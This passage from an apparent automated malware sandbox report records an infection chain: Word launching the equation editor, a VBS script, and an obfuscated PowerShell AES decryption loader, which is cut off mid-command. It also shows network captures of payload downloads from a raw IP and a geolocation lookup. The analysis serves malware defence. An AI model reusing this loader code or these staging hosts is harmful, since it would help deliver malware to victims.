                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                              Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4A
                              Jul 29, 2024 16:15:08.442611933 CEST1236INData Raw: 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 15 df 24 ae de 08 e7 2c 17 69 24 8e 7b 60 55 94 81 c7 4c a8 bb e3 ae 15 ce e5 07 b6 50 29 ea 0d 60 10 48 c8 01 dc 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04
                              Data Ascii: pC.J9x$,i${`ULP)`Ho9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQrXpIJI:
                              Jul 29, 2024 16:15:08.442656040 CEST1236INData Raw: 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a
                              Data Ascii: cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*A13E0DoE~52>)X5OnFQM*uQMVy#o\>5$0!\DYX`
                              Jul 29, 2024 16:15:08.442991018 CEST1236INData Raw: eb 61 9b 1b 8e 59 08 20 77 ef 81 b5 2f 89 15 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70
                              Data Ascii: aY w/-\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+ED
                              Jul 29, 2024 16:15:08.443032026 CEST1236INData Raw: 57 5c 80 2a 60 74 ef 64 8b 00 03 63 8e 98 1e 82 09 cb 79 72 9a da 0d d1 1c e0 55 27 3a a2 c1 88 8d 89 24 5f e9 81 f0 fd e8 19 a5 05 a4 6e 83 fc 39 a0 a4 35 58 1f 2b c0 4b 59 a2 d2 95 f3 59 5c 16 34 0a 11 c6 66 a4 fa 8d 1b 95 0c 5e 26 fe 12 6c 30
                              Data Ascii: W\*`tdcyrU':$_n95X+KYY\4f^&l0*8<KHSQ7Y3&S\p)3v'r:/>2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF
                              Jul 29, 2024 16:15:08.443084002 CEST1236INData Raw: 06 4f 0b d1 be 96 3d 34 91 ab 2a 0a 56 dd 44 fc 6f df 03 c5 b9 32 29 42 6c d7 5a ba c1 4e ab b5 4a a6 c2 a2 98 ef 27 77 c6 b3 d1 ff 00 f0 c7 fd a9 48 d4 a9 80 9b 60 45 30 1f 0c 3e a7 c1 f4 d0 68 e6 54 49 5c b0 f4 95 50 cc be d5 df ae 07 8f 50 c6
                              Data Ascii: O=4*VDo2)BlZNJ'wH`E0>hTI\PP@"c4J22)Fpc,i^Hm4q`w12>8miUnq`f7m(/=EDZ}=>G7'BfHH8iV;B?{<i3nYvb}<
                              Jul 29, 2024 16:15:08.443598032 CEST1236INData Raw: 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b 95 da c3 9e e7 f8 b1 d9 4b ad 3a 00 3e 7d 30 31 fc 69 61 85 16 38 c2 07 2d b8 ed 51 d2 b1 3d 0a 22 d3 b9 a2
                              Data Ascii: 4n%,yEa mVV]>e7]umCKK:>}01ia8-Q="O_!;jzEcn'J]h0T5xr]UC*K)\Foi2(3++GE/&8eU[:dW)V?L(D(E7,h$`c}f )*nsgS
                              Jul 29, 2024 16:15:08.443633080 CEST1236INData Raw: 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb
                              Data Ascii: G-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j}0=pk`ESqHx1>~M.#z_
                              Jul 29, 2024 16:15:08.443666935 CEST1236INData Raw: 3a 99 d6 dd ca ee 08 39 b5 20 96 f8 90 cc 09 cc fd 27 88 be 9f 49 a9 63 23 22 95 65 76 50 3d 41 81 1b 78 17 54 4e 01 24 f0 ff 00 0e d2 6b df 67 87 4a 49 a8 80 91 1e 22 24 60 76 95 2c c7 72 fa 4f 2d 5d af a9 cf 36 f3 69 54 ca 93 c3 b9 dc ee 49 76
                              Data Ascii: :9 'Ic#"evP=AxTN$kgJI"$`v,rO-]6iTIv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v
                              Jul 29, 2024 16:15:08.443701982 CEST1236INData Raw: e0 67 6d c5 09 50 73 52 24 48 68 f9 44 b3 77 1d f0 00 be 1c 8d 09 7d c4 1b e9 8e 26 91 5f 44 04 67 d4 3a 7b 93 f1 cd 08 d0 08 8b 88 5b 81 7c f7 39 63 ab 54 8e 35 8e 05 5e 79 38 19 51 46 9a 92 f1 3a 95 65 50 2c 71 cd f2 79 c1 6a 22 68 11 63 0d 61
                              Data Ascii: gmPsR$HhDw}&_Dg:{[|9cT5^y8QF:eP,qyj"hca]4hv!)Q#=qr%N'IG[u{AMB<!lsR>C!6yx$XjO~k !<=o4s$,fYz,q*t*Ux+,NG*)UeUe
                              Jul 29, 2024 16:15:08.448592901 CEST1236INData Raw: 1d bc 4e 78 3c 18 cf 20 06 49 5b 6c 6b 5c 02 6e b9 f6 eb 87 9f 4d e2 6d 0f 99 0e b8 34 86 ed 55 56 af b8 07 03 40 09 37 72 48 f6 ac 29 91 c8 0c c0 0a 1c 57 7f 9e 23 e1 52 6a df 4b bf 56 de b2 68 02 a0 1f 6e d8 fb 80 c4 03 db 03 cc 78 9c 1a d8 b5
                              Data Ascii: Nx< I[lk\nMm4UV@7rH)W#RjKVhnxZ$T}&6FhQ&2+eEqv<G+ZGO!"=y#_o^m Pq.by/Dh-6q'@4)*}eb-G=\r(,}if,


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.2249165172.245.123.11803076C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              TimestampBytes transferredDirectionData
                              Jul 29, 2024 16:15:11.326792002 CEST74OUTGET /47/BEN.txt HTTP/1.1
                              Host: 172.245.123.11
                              Connection: Keep-Alive
                              Jul 29, 2024 16:15:11.903148890 CEST1236INHTTP/1.1 200 OK
                              Date: Mon, 29 Jul 2024 14:15:11 GMT
                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                              Last-Modified: Mon, 29 Jul 2024 05:43:50 GMT
                              ETag: "a1000-61e5c5878b9d1"
                              Accept-Ranges: bytes
                              Content-Length: 659456
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/plain
                              Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED]
                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABAAAgPk6Dk+goP05Db+QmPc5DW+AlP84DN+AiPY4DE+ggPE4DA9wfP43D89wePk3D09gcP02Dr9QaPc2De9AXPo1DZ9gUPo0DJ9gAPozDy8gKPIyDa8gEPowDC7g+OIvDq7g4OotDS7gyOIoD66gsOoqDi6gmOIpDK6QiOIkD65gcOomDi5wWOolDY5AUOgkDA4AOOAjDo4AIOghDQ4ACOEcD+3g9N4eDm3g3NYdDO3ghN4bD52wtNYbD02gsNAbDv2ApNIaDf2glNIZDR2giNkYDD2ggNAUD51AeNYXDp1gZN4VDb1AUNsUDJ1ASNcUDF1wQNEQD80gONkTD40gNNQTDy0QLNsSDm0AJNMSDi0AIN4RDc0wFNURDU0gENARDO0QDNYQDFzw/MsPDuzA7MkODlzA2MYNDTzwzMIMDAyQvMkLDsygqMcKDjyglMQJDRyQjMAED+xweMcHDqxAaMUGDhxAVMIFDPxwCM4DD8wQOMcDD1wAKMYCDjwQIM8BDSwAEM0ADLwQCAAEAkAYA4AAAA/A/Po/D3/w8PY+Dk/Q4P09DQ/gzPs8DH/wgP47Dt+wqPg6Dk+AoPs5DK+AiPU4DB9AdPInDe5AWOYlDV5AVOAlDP5wSOUkDD5gQOEkDA4wPO4jD64QOOUjDv4QLOwiDr4
                              Jul 29, 2024 16:15:11.903213024 CEST1236INData Raw: 67 4b 4f 6b 69 44 6f 34 41 4a 4f 4d 69 44 66 34 51 47 4f 63 68 44 57 34 51 46 4f 51 68 44 54 34 77 44 4f 34 67 44 4b 34 41 42 4f 49 67 44 42 34 41 77 4e 38 66 44 2b 33 67 2b 4e 6b 66 44 31 33 77 37 4e 30 65 44 73 33 77 36 4e 63 65 44 6d 33 67 34
                              Data Ascii: gKOkiDo4AJOMiDf4QGOchDW4QFOQhDT4wDO4gDK4ABOIgDB4AwN8fD+3g+NkfD13w7N0eDs3w6NceDm3g4NEeDd3w1NUdDU3A0NocDI3wxNYcDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1AUN8UDO1gSNkUDF0wPN
                              Jul 29, 2024 16:15:11.903265953 CEST1236INData Raw: 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44 62 37 51 32 4f 63 74 44
                              Data Ascii: xDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd
                              Jul 29, 2024 16:15:11.903302908 CEST1236INData Raw: 77 77 4f 49 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 55 53 44 6b 30 77 49 4e 49 53 44 68 30 41 49 4e 38 52 44 65 30 51 48 4e 77 52 44 62 30 67 47 4e 6b 52 44 59 30 77 46 4e 59 52 44 55 30 77 45 4e 49 52 44 52 30 41 45 4e 38 51 44 4e 30 67 43
                              Data Ascii: wwOIAAAAAOAFAOAAAANUSDk0wINISDh0AIN8RDe0QHNwRDb0gGNkRDY0wFNYRDU0wENIRDR0AEN8QDN0gCNkQDI0wBNYQDF0ABNMQDB0AwM8PD+zQ/MwPD7zg+MgPD2AAAAcBQBQDgOsrD66QuOgrD36gtOUrD06wsOIrDx6AsO8qDu6QrOwqDr6gqOkqDo6wpOYqDl6ApOMqDi6QoOAqDf6gnO0pDc6wmOopDZ6AmOcpDW6QlO
                              Jul 29, 2024 16:15:11.903378010 CEST1236INData Raw: 79 44 6a 38 51 49 50 38 78 44 64 38 77 47 50 6b 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44
                              Data Ascii: yDj8QIP8xDd8wGPkxDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv
                              Jul 29, 2024 16:15:11.903460026 CEST1236INData Raw: 41 33 50 6d 39 44 58 2f 49 31 50 49 39 6a 50 2f 49 7a 50 6e 38 54 48 2f 4d 78 50 4a 34 7a 2f 2b 51 75 50 4a 37 6a 70 2b 4d 6f 50 6f 35 6a 58 2b 51 6c 50 4b 35 44 51 2b 59 6a 50 73 34 6a 49 2b 67 68 50 4f 34 44 42 39 6f 66 50 77 33 6a 35 39 77 64
                              Data Ascii: A3Pm9DX/I1PI9jP/IzPn8TH/MxPJ4z/+QuPJ7jp+MoPo5jX+QlPK5DQ+YjPs4jI+ghPO4DB9ofPw3j59wdPS3Dy94bP12jj9YYPv1zS98APRzDl8gFPJxjO8cwO/vzO7MzOroz464rOcqzd6gmOZlDl4Y0Neejg24vNhPTFz8gM7LT3yssMGHzZxMTMCAD/wUJAAAAtAUAcAAAA/o6Pb+zj/83Pi9jW/AjPp7Ty+0rPx6Tn+EpP
                              Jul 29, 2024 16:15:11.903492928 CEST1236INData Raw: 33 44 6d 39 41 55 50 77 30 6a 4a 39 6b 52 50 50 30 44 41 38 59 4f 50 66 7a 44 32 38 45 4e 50 65 79 54 69 38 51 49 50 7a 78 54 61 38 73 45 50 76 77 54 48 38 73 77 4f 38 76 6a 67 36 6b 6e 4f 53 6c 7a 35 35 41 63 4f 62 59 6a 55 32 4d 54 4e 46 58 6a
                              Data Ascii: 3Dm9AUPw0jJ9kRPP0DA8YOPfzD28ENPeyTi8QIPzxTa8sEPvwTH8swO8vjg6knOSlz55AcObYjU2MTNFXja1kAN9QDM0gyM7LTxyIoMhJTWyEkMtEDYxEDMBDjdw4GAAAAbAQA4A8j8/s+Pr+DT/8hPc7T0+gsPk6jf+YnPX4zD98dPO3TI8QLPUyTZ80FPFxTO7I/OevDp7AkO1rD76MuONrTw6MqObqDk6coOxpzW6AiOVoDD
                              Jul 29, 2024 16:15:11.903626919 CEST1236INData Raw: 4d 58 4f 75 6c 54 61 35 34 56 4f 43 6c 54 4c 35 6b 51 4f 45 67 7a 2f 34 51 50 4f 59 6a 44 74 34 63 49 4f 43 69 54 66 34 49 48 4f 57 68 44 54 34 34 43 4f 70 67 44 4a 34 6b 78 4e 39 66 7a 38 33 67 39 4e 54 66 6a 7a 33 4d 38 4e 6e 65 54 6e 33 49 34
                              Data Ascii: MXOulTa54VOClTL5kQOEgz/4QPOYjDt4cIOCiTf4IHOWhDT44COpgDJ4kxN9fz83g9NTfjz3M8NneTn3I4N9dDe302NRdzR3wyNncjI3chNkbDw2srN2azq24oNqZjN2URN9XD+1MfNoXj11QbNmWjm1sYNyVzS1MUNsUDH0AONYTzu0YLNxSDX0cFNFRjP0gDNxQzBz0+MZPT0zU8MoOjnzs3MxNDXzs0MpMzHzIxMJIz7y4tM
                              Jul 29, 2024 16:15:11.903660059 CEST1236INData Raw: 4c 6a 6c 79 55 6e 4d 52 4a 6a 53 79 55 55 4d 56 48 54 47 77 6f 45 41 41 41 41 51 41 51 41 41 41 38 6a 6c 2f 45 35 50 79 35 6a 64 2b 55 6c 50 78 34 6a 4b 2b 55 53 50 34 79 44 7a 38 77 5a 4f 41 6c 6a 4e 79 63 72 4d 51 41 44 34 77 6f 4c 4d 64 43 41
                              Data Ascii: LjlyUnMRJjSyUUMVHTGwoEAAAAQAQAAA8jl/E5Py5jd+UlPx4jK+USP4yDz8wZOAljNycrMQAD4woLMdCAAAwCADAPAAAwPn/zy/I3PYlTG4YLOkhDY4wFOYhDV4AFOMhDS4QEOAhDP4gDOcUTYzQAAAAANAMA4AAAA2wjN4YDN2AjNsYDK2QiNgUDl1wRNYUDF1ARNMUDC1QQNAQDdzw/M4PD9zA/MsPD6zQ+MgPzVyAuMcLD2
                              Jul 29, 2024 16:15:11.903693914 CEST1236INData Raw: 77 41 4d 47 41 54 41 41 41 51 41 59 41 77 41 67 42 41 41 41 38 7a 2b 2f 55 2f 50 76 2f 6a 36 2f 51 2b 50 65 2f 44 32 2f 4d 39 50 4e 2f 6a 78 2f 45 38 50 38 2b 6a 74 2f 41 37 50 71 2b 54 70 2f 38 35 50 5a 2b 7a 6b 2f 34 34 50 49 2b 6a 67 2f 77 33
                              Data Ascii: wAMGATAAAQAYAwAgBAAA8z+/U/Pv/j6/Q+Pe/D2/M9PN/jx/E8P8+jt/A7Pq+Tp/85PZ+zk/44PI+jg/w3P39Tc/s2Pl9DY/o1PU9jT/k0PD9TP/czPy8DL/YyPg8zG/UxPP8TC/QgP+7D++IvPt7z5+EuPb7j1+AtPK7Dx+8rP56zs+0qPo6jo+wpPW6Tk+soPF6zf+onP05Tb+YmPg1z+9QBPIyDR8cDPwwjK8QCPTsj97E+O
                              Jul 29, 2024 16:15:11.909944057 CEST1236INData Raw: 70 6a 61 36 59 6d 4f 69 70 6a 55 36 30 6a 4f 72 6f 54 49 36 63 52 4f 37 6e 44 37 35 30 64 4f 57 6e 44 7a 35 49 63 4f 34 6d 6a 72 35 51 61 4f 78 6c 44 57 35 49 55 4f 70 6b 6a 49 35 59 52 4f 50 6b 44 43 34 34 4e 4f 55 6a 54 7a 34 59 4d 4f 2f 69 44
                              Data Ascii: pja6YmOipjU60jOroTI6cRO7nD750dOWnDz5IcO4mjr5QaOxlDW5IUOpkjI5YROPkDC44NOUjTz4YMO/iDu4QIO6hzc4sDO0gjF3o/NpDAAAAHACAIAAAQOikzG58QOIgT/4YPOujD34wMOFjTu4ILOkiTn4UJODizc4wGOghTW4sEOEhDP4oCOagzE4cAOAcj83s+NjfT038xNScDB2EvNibjr2AqNPaje2oiNdYzD1wfNtXDq


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.2249167178.237.33.50803228C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              TimestampBytes transferredDirectionData
                              Jul 29, 2024 16:15:15.245279074 CEST71OUTGET /json.gp HTTP/1.1
                              Host: geoplugin.net
                              Cache-Control: no-cache
                              Jul 29, 2024 16:15:15.887590885 CEST1170INHTTP/1.1 200 OK
                              date: Mon, 29 Jul 2024 14:15:15 GMT
                              server: Apache
                              content-length: 962
                              content-type: application/json; charset=utf-8
                              cache-control: public, max-age=300
                              access-control-allow-origin: *
                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                              Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:10:14:59
                              Start date:29/07/2024
                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                              Imagebase:0x13f5f0000
                              File size:1'423'704 bytes
                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:2
                              Start time:10:15:00
                              Start date:29/07/2024
                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                              Imagebase:0x400000
                              File size:543'304 bytes
                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:5
                              Start time:10:15:04
                              Start date:29/07/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS"
                              Imagebase:0x4a0000
                              File size:141'824 bytes
                              MD5 hash:979D74799EA6C8B8167869A68DF5204A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:6
                              Start time:10:15:05
                              Start date:29/07/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = 